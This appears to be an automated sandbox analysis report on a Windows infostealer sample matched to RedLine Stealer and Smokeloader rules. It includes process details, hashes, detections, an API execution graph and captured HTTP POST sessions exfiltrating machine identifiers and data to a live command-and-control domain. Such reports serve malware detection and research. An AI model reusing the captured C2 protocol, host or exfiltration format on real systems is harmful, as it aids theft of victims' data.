                                                                                              2024-12-18 12:49:36 UTC308INData Raw: 56 43 35 45 55 6f 6d 6a 45 65 49 77 61 6c 36 42 6d 36 47 70 68 39 63 6b 35 4d 46 2b 38 79 75 54 66 66 77 6f 34 75 78 50 39 2b 2f 6c 57 79 45 47 76 54 4d 53 56 38 42 75 58 34 45 36 46 36 79 43 51 73 47 30 56 49 75 31 57 35 66 59 43 41 78 33 6e 5a 2f 32 6a 2b 46 50 46 61 4b 70 74 79 4e 32 34 42 67 35 5a 6d 34 43 4b 64 5a 47 31 33 5a 41 47 34 47 4b 6b 71 79 5a 36 63 4f 73 57 78 4e 36 67 54 76 41 67 33 33 53 6b 59 4c 51 37 39 6c 77 2b 36 4e 39 73 72 50 48 78 5a 43 4b 77 53 75 53 79 56 39 5a 4d 30 7a 61 67 68 2f 68 32 79 54 6e 6a 46 49 57 38 74 51 71 7a 6f 47 61 70 39 77 43 59 76 48 67 70 55 76 56 75 32 66 63 36 53 30 57 75 46 2f 79 4c 2b 43 37 49 50 4f 34 39 6a 4a 32 35 51 76 75 39 2f 78 41 47 63 64 58 6c 4f 53 6b 53 4d 48 72 73 36 6d 4a 7a 4a 4e 6f 76 6e 43
                                                                                              Data Ascii: VC5EUomjEeIwal6Bm6Gph9ck5MF+8yuTffwo4uxP9+/lWyEGvTMSV8BuX4E6F6yCQsG0VIu1W5fYCAx3nZ/2j+FPFaKptyN24Bg5Zm4CKdZG13ZAG4GKkqyZ6cOsWxN6gTvAg33SkYLQ79lw+6N9srPHxZCKwSuSyV9ZM0zagh/h2yTnjFIW8tQqzoGap9wCYvHgpUvVu2fc6S0WuF/yL+C7IPO49jJ25Qvu9/xAGcdXlOSkSMHrs6mJzJNovnC
                                                                                              2024-12-18 12:49:36 UTC1369INData Raw: 33 30 61 30 0d 0a 64 54 41 74 48 75 33 36 47 71 39 38 7a 43 4d 75 56 68 51 66 34 67 50 76 5a 59 71 63 79 53 75 4c 35 33 44 35 55 4f 42 61 50 70 35 6e 49 69 70 34 67 36 74 58 39 79 43 51 63 6b 4a 33 64 41 75 6a 46 71 46 2f 36 63 53 45 4b 63 69 36 4e 34 42 74 2f 45 38 73 6d 6e 38 6e 62 51 62 7a 36 45 36 36 64 36 49 7a 4e 41 6c 6c 53 4f 49 4e 37 32 57 59 35 34 6f 33 78 62 67 6d 72 78 37 52 58 6a 57 53 65 69 41 74 43 50 32 75 41 61 4a 2f 31 54 4e 34 57 42 70 65 38 6b 66 30 61 49 75 46 32 57 76 55 38 53 6e 2b 52 62 49 51 61 74 4d 78 4d 79 30 65 2f 65 39 50 39 79 36 59 66 58 39 62 53 41 43 68 41 36 78 36 35 75 79 6f 4e 4d 43 7a 50 62 46 59 7a 48 59 5a 6b 48 6f 74 59 45 6d 32 6c 6e 2f 76 4c 4a 56 39 65 31 39 4c 52 75 78 56 6f 48 32 41 36 38 6c 78 69 34 42 2b 2f
                                                                                              Data Ascii: 30a0dTAtHu36Gq98zCMuVhQf4gPvZYqcySuL53D5UOBaPp5nIip4g6tX9yCQckJ3dAujFqF/6cSEKci6N4Bt/E8smn8nbQbz6E66d6IzNAllSOIN72WY54o3xbgmrx7RXjWSeiAtCP2uAaJ/1TN4WBpe8kf0aIuF2WvU8Sn+RbIQatMxMy0e/e9P9y6YfX9bSAChA6x65uyoNMCzPbFYzHYZkHotYEm2ln/vLJV9e19LRuxVoH2A68lxi4B+/
                                                                                              2024-12-18 12:49:36 UTC1369INData Raw: 6f 7a 32 35 76 64 41 61 72 36 42 6d 6f 59 64 74 68 50 42 45 61 51 61 45 48 76 54 76 62 78 49 70 2b 39 59 45 56 71 56 44 69 54 6a 75 6a 54 77 70 68 51 4c 71 79 52 76 77 4a 75 7a 4d 79 43 56 56 47 2b 69 7a 76 64 5a 6a 74 78 33 6e 54 2f 32 6a 2b 5a 76 46 47 4e 70 70 6e 4d 43 42 6a 71 71 74 52 2f 43 7a 62 50 54 78 50 47 6c 37 79 57 2b 38 35 79 5a 4c 52 61 5a 6e 6b 5a 65 30 45 6f 68 6f 6e 30 32 68 68 65 77 62 6c 2b 67 2b 36 50 64 73 72 50 41 35 5a 46 4c 41 54 72 43 76 62 6c 62 63 48 37 62 77 68 74 48 4c 2f 57 44 2b 6a 54 7a 52 75 53 4c 4f 76 56 2b 74 76 31 54 4e 7a 43 51 49 2f 34 6c 33 6a 4f 39 76 45 79 51 61 46 2f 79 6a 2b 43 37 4a 39 4f 35 4e 2f 4a 6e 74 58 38 49 35 43 36 79 57 36 66 6d 78 4f 47 6b 6a 69 45 2b 39 6c 69 35 7a 4a 50 64 72 2f 61 4f 34 42 71 52
                                                                                              Data Ascii: oz25vdAar6BmoYdthPBEaQaEHvTvbxIp+9YEVqVDiTjujTwphQLqyRvwJuzMyCVVG+izvdZjtx3nT/2j+ZvFGNppnMCBjqqtR/CzbPTxPGl7yW+85yZLRaZnkZe0Eohon02hhewbl+g+6PdsrPA5ZFLATrCvblbcH7bwhtHL/WD+jTzRuSLOvV+tv1TNzCQI/4l3jO9vEyQaF/yj+C7J9O5N/JntX8I5C6yW6fmxOGkjiE+9li5zJPdr/aO4BqR


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              3192.168.2.849708172.67.220.2234433032C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              2024-12-18 12:49:38 UTC270OUTPOST /api HTTP/1.1
                                                                                              Connection: Keep-Alive
                                                                                              Content-Type: multipart/form-data; boundary=99VJBESC
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                              Content-Length: 12781
                                                                                              Host: rapeflowwj.lat
                                                                                              2024-12-18 12:49:38 UTC12781OUTData Raw: 2d 2d 39 39 56 4a 42 45 53 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 44 31 38 41 45 33 43 36 37 32 45 36 46 31 30 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 39 39 56 4a 42 45 53 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 39 39 56 4a 42 45 53 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 34 68 35 56 66 48 2d 2d 0d 0a 2d 2d 39 39 56 4a 42 45 53 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20
                                                                                              Data Ascii: --99VJBESCContent-Disposition: form-data; name="hwid"8D18AE3C672E6F10AC8923850305D13E--99VJBESCContent-Disposition: form-data; name="pid"2--99VJBESCContent-Disposition: form-data; name="lid"4h5VfH----99VJBESCContent-Disposition:
                                                                                              2024-12-18 12:49:38 UTC1038INHTTP/1.1 200 OK
                                                                                              Date: Wed, 18 Dec 2024 12:49:38 GMT
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                              Transfer-Encoding: chunked
                                                                                              Connection: close
                                                                                              Set-Cookie: PHPSESSID=4et6k00vsf7n28do9pn8kvl3i3; expires=Sun, 13-Apr-2025 06:36:17 GMT; Max-Age=9999999; path=/
                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              cf-cache-status: DYNAMIC
                                                                                              vary: accept-encoding
                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=AF4pYnIEzdKwq6OvDoB0Xt2AZBrIXwqDDHAxhhV8tCnoZ%2FFiqlb0ZTkQ2pm5yht8QsUBoEksZeZa9rvVWwdsyYFLsHFraUGs3u9sdIjIegNPCeBvVXi%2BFI1GjVoilpmPHw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                              Server: cloudflare
                                                                                              CF-RAY: 8f3f46265c505e61-EWR
                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1729&min_rtt=1722&rtt_var=660&sent=10&recv=18&lost=0&retrans=0&sent_bytes=2836&recv_bytes=13709&delivery_rate=1640449&cwnd=209&unsent_bytes=0&cid=a73c39f05ea7c67a&ts=856&x=0"
                                                                                              2024-12-18 12:49:38 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                              Data Ascii: fok 8.46.123.189
                                                                                              2024-12-18 12:49:38 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                              Data Ascii: 0


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              4192.168.2.849711172.67.220.2234433032C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              2024-12-18 12:49:40 UTC274OUTPOST /api HTTP/1.1
                                                                                              Connection: Keep-Alive
                                                                                              Content-Type: multipart/form-data; boundary=5TJ6E56H7BJU
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                              Content-Length: 15034
                                                                                              Host: rapeflowwj.lat
                                                                                              2024-12-18 12:49:40 UTC15034OUTData Raw: 2d 2d 35 54 4a 36 45 35 36 48 37 42 4a 55 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 44 31 38 41 45 33 43 36 37 32 45 36 46 31 30 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 35 54 4a 36 45 35 36 48 37 42 4a 55 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 35 54 4a 36 45 35 36 48 37 42 4a 55 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 34 68 35 56 66 48 2d 2d 0d 0a 2d 2d 35 54 4a 36 45 35 36 48 37 42 4a 55 0d 0a 43 6f 6e 74 65
                                                                                              Data Ascii: --5TJ6E56H7BJUContent-Disposition: form-data; name="hwid"8D18AE3C672E6F10AC8923850305D13E--5TJ6E56H7BJUContent-Disposition: form-data; name="pid"2--5TJ6E56H7BJUContent-Disposition: form-data; name="lid"4h5VfH----5TJ6E56H7BJUConte
                                                                                              2024-12-18 12:49:41 UTC1034INHTTP/1.1 200 OK
                                                                                              Date: Wed, 18 Dec 2024 12:49:40 GMT
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                              Transfer-Encoding: chunked
                                                                                              Connection: close
                                                                                              Set-Cookie: PHPSESSID=a1usne3eafdg3t894et4gv2dmo; expires=Sun, 13-Apr-2025 06:36:19 GMT; Max-Age=9999999; path=/
                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              cf-cache-status: DYNAMIC
                                                                                              vary: accept-encoding
                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=hYUtBy6cVfXOykZEC4sDuqNUkTuAdwtdveNTzl6upbLEcGuaJZ8R3xpdMNSVyLltIibOJGHndirZgE891QIk5F6GZ8V7dd7o1ytP1FMWzY8yKEg967MuSrzCTJTvVwPHDA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                              Server: cloudflare
                                                                                              CF-RAY: 8f3f46345b4fef9d-EWR
                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1836&min_rtt=1820&rtt_var=715&sent=13&recv=18&lost=0&retrans=0&sent_bytes=2835&recv_bytes=15966&delivery_rate=1495135&cwnd=121&unsent_bytes=0&cid=8c75469e7623a151&ts=769&x=0"
                                                                                              2024-12-18 12:49:41 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                              Data Ascii: fok 8.46.123.189
                                                                                              2024-12-18 12:49:41 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                              Data Ascii: 0


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              5192.168.2.849714172.67.220.2234433032C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              2024-12-18 12:49:42 UTC273OUTPOST /api HTTP/1.1
                                                                                              Connection: Keep-Alive
                                                                                              Content-Type: multipart/form-data; boundary=72ERRQ127ZK
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                              Content-Length: 20195
                                                                                              Host: rapeflowwj.lat
                                                                                              2024-12-18 12:49:42 UTC15331OUTData Raw: 2d 2d 37 32 45 52 52 51 31 32 37 5a 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 44 31 38 41 45 33 43 36 37 32 45 36 46 31 30 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 37 32 45 52 52 51 31 32 37 5a 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 37 32 45 52 52 51 31 32 37 5a 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 34 68 35 56 66 48 2d 2d 0d 0a 2d 2d 37 32 45 52 52 51 31 32 37 5a 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44
                                                                                              Data Ascii: --72ERRQ127ZKContent-Disposition: form-data; name="hwid"8D18AE3C672E6F10AC8923850305D13E--72ERRQ127ZKContent-Disposition: form-data; name="pid"3--72ERRQ127ZKContent-Disposition: form-data; name="lid"4h5VfH----72ERRQ127ZKContent-D
                                                                                              2024-12-18 12:49:42 UTC4864OUTData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 3e 37 1c 1d 96 fa 7e 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 73 c3 c1 e7 62 c9 e0 95 58 f0 4a f0 ab c1 ff 36 1e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 fc e4 dd 93 3c 16 af 54 8b b3 c5 72 6e a6 5a 98 2a 94 a7 ae e5 a6 2a 8d 72 3d 31 9a 3c bc 29 a5 d6 98 ff 70 58 68 ff bb af ff fe e4 44 a2 4b 2d b9 ca 4c ae 76 b9 91 af 16 6a c9 bb 46 a2 8c 4b 7d 38 f8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 61 38 3a 2c f5 fd 30 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 e7 86 a3 c3 52 df
                                                                                              Data Ascii: >7~sbXJ6<TrnZ**r=1<)pXhDK-LvjFK}8a8:,0R
                                                                                              2024-12-18 12:49:44 UTC1041INHTTP/1.1 200 OK
                                                                                              Date: Wed, 18 Dec 2024 12:49:44 GMT
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                              Transfer-Encoding: chunked
                                                                                              Connection: close
                                                                                              Set-Cookie: PHPSESSID=lhi7ogemt6cfi6jde2qv3ll1v5; expires=Sun, 13-Apr-2025 06:36:22 GMT; Max-Age=9999999; path=/
                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              cf-cache-status: DYNAMIC
                                                                                              vary: accept-encoding
                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=GMUrU9orUfwc5NXwHTsZTwXivtZWxGdKZIJiFjmRvYxGGYFJY%2FVB3oZUPLOYlec2bAfOteAP2ksoOybBLmO3ptnTt0vRBHBndDwd4%2BqJh0o9NLZnErbHncpbJqxqCmn8%2BQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                              Server: cloudflare
                                                                                              CF-RAY: 8f3f46431a6cc439-EWR
                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1495&min_rtt=1485&rtt_var=577&sent=17&recv=27&lost=0&retrans=0&sent_bytes=2836&recv_bytes=21148&delivery_rate=1864623&cwnd=207&unsent_bytes=0&cid=c5ee44dccedb3731&ts=1683&x=0"
                                                                                              2024-12-18 12:49:44 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                              Data Ascii: fok 8.46.123.189
                                                                                              2024-12-18 12:49:44 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                              Data Ascii: 0


                                                                                              Click to jump to process

                                                                                              Click to jump to process

                                                                                              Click to dive into process behavior distribution

                                                                                              Click to jump to process

                                                                                              Target ID:0
                                                                                              Start time:07:49:19
                                                                                              Start date:18/12/2024
                                                                                              Path:C:\Users\user\Desktop\InstallSetup.exe
                                                                                              Wow64 process (32bit):true
                                                                                              Commandline:"C:\Users\user\Desktop\InstallSetup.exe"
                                                                                              Imagebase:0x400000
                                                                                              File size:436'736 bytes
                                                                                              MD5 hash:8D746459E4ECDC159BD431BBC01E9672
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Yara matches:
                                                                                              • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000000.00000002.3922162162.0000000000C00000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                              • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000000.00000002.3920122138.0000000000940000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                              Reputation:low
                                                                                              Has exited:false

                                                                                              Target ID:3
                                                                                              Start time:07:49:27
                                                                                              Start date:18/12/2024
                                                                                              Path:C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe
                                                                                              Wow64 process (32bit):true
                                                                                              Commandline:"C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe"
                                                                                              Imagebase:0x400000
                                                                                              File size:368'128 bytes
                                                                                              MD5 hash:9026F04B1266851659FB62C91BD7F2F3
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Yara matches:
                                                                                              • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000003.00000002.1818190463.0000000000970000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                              • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000003.00000002.1818342942.0000000000A50000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                              Antivirus matches:
                                                                                              • Detection: 100%, Avira
                                                                                              • Detection: 100%, Joe Sandbox ML
                                                                                              • Detection: 68%, ReversingLabs
                                                                                              Reputation:low
                                                                                              Has exited:true

                                                                                              Target ID:7
                                                                                              Start time:07:49:43
                                                                                              Start date:18/12/2024
                                                                                              Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                              Wow64 process (32bit):true
                                                                                              Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 3032 -s 1952
                                                                                              Imagebase:0x310000
                                                                                              File size:483'680 bytes
                                                                                              MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Reputation:high
                                                                                              Has exited:true

                                                                                              Reset < >

                                                                                                Execution Graph

                                                                                                Execution Coverage:2.6%
                                                                                                Dynamic/Decrypted Code Coverage:3.4%
                                                                                                Signature Coverage:4.9%
                                                                                                Total number of Nodes:878
                                                                                                Total number of Limit Nodes:19
                                                                                                execution_graph 64979 402c04 InternetOpenW 64980 402e55 64979->64980 64983 402c37 Hash 64979->64983 65000 40f8cf 64980->65000 64982 402e64 64991 42defd 64983->64991 64986 42defd std::_Locinfo::_Locinfo_dtor 26 API calls 64987 402e17 64986->64987 64988 42defd std::_Locinfo::_Locinfo_dtor 26 API calls 64987->64988 64989 402e29 InternetOpenUrlW 64988->64989 64989->64980 64990 402e44 InternetCloseHandle InternetCloseHandle 64989->64990 64990->64980 64992 42df1a 64991->64992 64994 42df0c 64991->64994 65007 42eac9 20 API calls __dosmaperr 64992->65007 64994->64992 64997 42df4a 64994->64997 64996 402e09 64996->64986 64997->64996 65009 42eac9 20 API calls __dosmaperr 64997->65009 64999 42df24 65008 42a59d 26 API calls _Deallocate 64999->65008 65001 40f8d8 65000->65001 65002 40f8da IsProcessorFeaturePresent 65000->65002 65001->64982 65004 40f94d 65002->65004 65010 40f911 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 65004->65010 65006 40fa30 65006->64982 65007->64999 65008->64996 65009->64999 65010->65006 65011 40fc06 65012 40fc12 BuildCatchObjectHelperInternal 65011->65012 65040 40fff3 65012->65040 65014 40fc19 65015 40fd6c 65014->65015 65018 40fc43 65014->65018 65061 4104d3 4 API calls 2 library calls 65015->65061 65017 40fd73 65062 42ffc9 28 API calls _Atexit 65017->65062 65029 40fc82 ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 65018->65029 65055 42fcee 5 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 65018->65055 65020 40fd79 65063 42ff7b 28 API calls _Atexit 65020->65063 65023 40fd81 65024 40fc62 65025 40fc5c 65025->65024 65056 42fc92 5 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 65025->65056 65027 40fce3 65051 4105ed 65027->65051 65029->65027 65057 42a366 167 API calls 4 library calls 65029->65057 65031 40fce9 65032 40fcfe 65031->65032 65058 410623 GetModuleHandleW 65032->65058 65034 40fd05 65034->65017 65035 40fd09 65034->65035 65036 40fd12 65035->65036 65059 42ff6c 28 API calls _Atexit 65035->65059 65060 410182 13 API calls 2 library calls 65036->65060 65039 40fd1a 65039->65024 65041 40fffc 65040->65041 65064 41077b IsProcessorFeaturePresent 65041->65064 65043 410008 65065 428827 10 API calls 3 library calls 65043->65065 65045 41000d 65046 410011 65045->65046 65066 4317a1 IsProcessorFeaturePresent SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 65045->65066 65046->65014 65048 41001a 65049 410028 65048->65049 65067 428850 8 API calls 3 library calls 65048->65067 65049->65014 65068 426830 65051->65068 65054 410613 65054->65031 65055->65025 65056->65029 65057->65027 65058->65034 65059->65036 65060->65039 65061->65017 65062->65020 65063->65023 65064->65043 65065->65045 65066->65048 65067->65046 65069 410600 GetStartupInfoW 65068->65069 65069->65054 65070 c00c66 65071 c00c69 65070->65071 65074 c00f16 65071->65074 65075 c00f25 65074->65075 65078 c016b6 65075->65078 65081 c016d1 65078->65081 65079 c016da CreateToolhelp32Snapshot 65080 c016f6 Module32First 65079->65080 65079->65081 65082 c01705 65080->65082 65083 c00f15 65080->65083 65081->65079 65081->65080 65085 c01375 65082->65085 65086 c013a0 65085->65086 65087 c013b1 VirtualAlloc 65086->65087 65088 c013e9 65086->65088 65087->65088 65088->65088 65089 432785 65094 432553 65089->65094 65092 4327ad 65099 43257e 65094->65099 65096 432771 65113 42a59d 26 API calls _Deallocate 65096->65113 65098 4326d0 65098->65092 65106 43d01c 65098->65106 65102 4326c7 65099->65102 65109 43c8ce 170 API calls 2 library calls 65099->65109 65101 432711 65101->65102 65110 43c8ce 170 API calls 2 library calls 65101->65110 65102->65098 65112 42eac9 20 API calls __dosmaperr 65102->65112 65104 432730 65104->65102 65111 43c8ce 170 API calls 2 library calls 65104->65111 65114 43c9f1 65106->65114 65108 43d037 65108->65092 65109->65101 65110->65104 65111->65102 65112->65096 65113->65098 65117 43c9fd BuildCatchObjectHelperInternal 65114->65117 65115 43ca0b 65132 42eac9 20 API calls __dosmaperr 65115->65132 65117->65115 65118 43ca44 65117->65118 65125 43cfcb 65118->65125 65119 43ca10 65133 42a59d 26 API calls _Deallocate 65119->65133 65124 43ca1a __wsopen_s 65124->65108 65135 43f941 65125->65135 65127 43ca68 65134 43ca91 LeaveCriticalSection __wsopen_s 65127->65134 65132->65119 65133->65124 65134->65124 65136 43f964 65135->65136 65137 43f94d 65135->65137 65139 43f983 65136->65139 65140 43f96c 65136->65140 65212 42eac9 20 API calls __dosmaperr 65137->65212 65216 434faa 10 API calls 2 library calls 65139->65216 65214 42eac9 20 API calls __dosmaperr 65140->65214 65142 43f952 65213 42a59d 26 API calls _Deallocate 65142->65213 65144 43f98a MultiByteToWideChar 65147 43f9b9 65144->65147 65148 43f9a9 GetLastError 65144->65148 65146 43f971 65215 42a59d 26 API calls _Deallocate 65146->65215 65218 4336a7 21 API calls 3 library calls 65147->65218 65217 42ea93 20 API calls 3 library calls 65148->65217 65152 43cfe1 65152->65127 65159 43d03c 65152->65159 65153 43f9c1 65154 43f9c8 MultiByteToWideChar 65153->65154 65158 43f9e9 65153->65158 65156 43f9dd GetLastError 65154->65156 65154->65158 65155 43346a _free 20 API calls 65155->65152 65219 42ea93 20 API calls 3 library calls 65156->65219 65158->65155 65220 43cd9f 65159->65220 65162 43d087 65238 43977e 65162->65238 65163 43d06e 65252 42eab6 20 API calls __dosmaperr 65163->65252 65166 43d08c 65167 43d095 65166->65167 65168 43d0ac 65166->65168 65254 42eab6 20 API calls __dosmaperr 65167->65254 65251 43cd0a CreateFileW 65168->65251 65172 43d09a 65255 42eac9 20 API calls __dosmaperr 65172->65255 65174 43d162 GetFileType 65176 43d16d GetLastError 65174->65176 65180 43d1b4 65174->65180 65175 43d137 GetLastError 65257 42ea93 20 API calls 3 library calls 65175->65257 65258 42ea93 20 API calls 3 library calls 65176->65258 65177 43d0e5 65177->65174 65177->65175 65256 43cd0a CreateFileW 65177->65256 65260 4396c7 21 API calls 3 library calls 65180->65260 65182 43d073 65253 42eac9 20 API calls __dosmaperr 65182->65253 65183 43d17b CloseHandle 65183->65182 65186 43d1a4 65183->65186 65185 43d12a 65185->65174 65185->65175 65259 42eac9 20 API calls __dosmaperr 65186->65259 65187 43d1d5 65189 43d221 65187->65189 65261 43cf1b 169 API calls 4 library calls 65187->65261 65194 43d24e 65189->65194 65262 43cabd 167 API calls 4 library calls 65189->65262 65190 43d1a9 65190->65182 65193 43d247 65193->65194 65195 43d25f 65193->65195 65263 4335cd 29 API calls 2 library calls 65194->65263 65197 43d009 65195->65197 65198 43d2dd CloseHandle 65195->65198 65206 43346a 65197->65206 65264 43cd0a CreateFileW 65198->65264 65200 43d308 65201 43d312 GetLastError 65200->65201 65205 43d257 65200->65205 65265 42ea93 20 API calls 3 library calls 65201->65265 65203 43d31e 65266 439890 21 API calls 3 library calls 65203->65266 65205->65197 65207 433475 HeapFree 65206->65207 65211 43349e _free 65206->65211 65208 43348a 65207->65208 65207->65211 65289 42eac9 20 API calls __dosmaperr 65208->65289 65210 433490 GetLastError 65210->65211 65211->65127 65212->65142 65213->65152 65214->65146 65215->65152 65216->65144 65217->65152 65218->65153 65219->65158 65221 43cdc0 65220->65221 65222 43cdda 65220->65222 65221->65222 65274 42eac9 20 API calls __dosmaperr 65221->65274 65267 43cd2f 65222->65267 65225 43cdcf 65275 42a59d 26 API calls _Deallocate 65225->65275 65227 43ce12 65228 43ce41 65227->65228 65276 42eac9 20 API calls __dosmaperr 65227->65276 65231 43ce94 65228->65231 65278 42ffdf 26 API calls 2 library calls 65228->65278 65231->65162 65231->65163 65232 43ce8f 65232->65231 65234 43cf0e 65232->65234 65233 43ce36 65277 42a59d 26 API calls _Deallocate 65233->65277 65279 42a5ca 11 API calls _Atexit 65234->65279 65237 43cf1a 65239 43978a BuildCatchObjectHelperInternal 65238->65239 65282 42e3ed 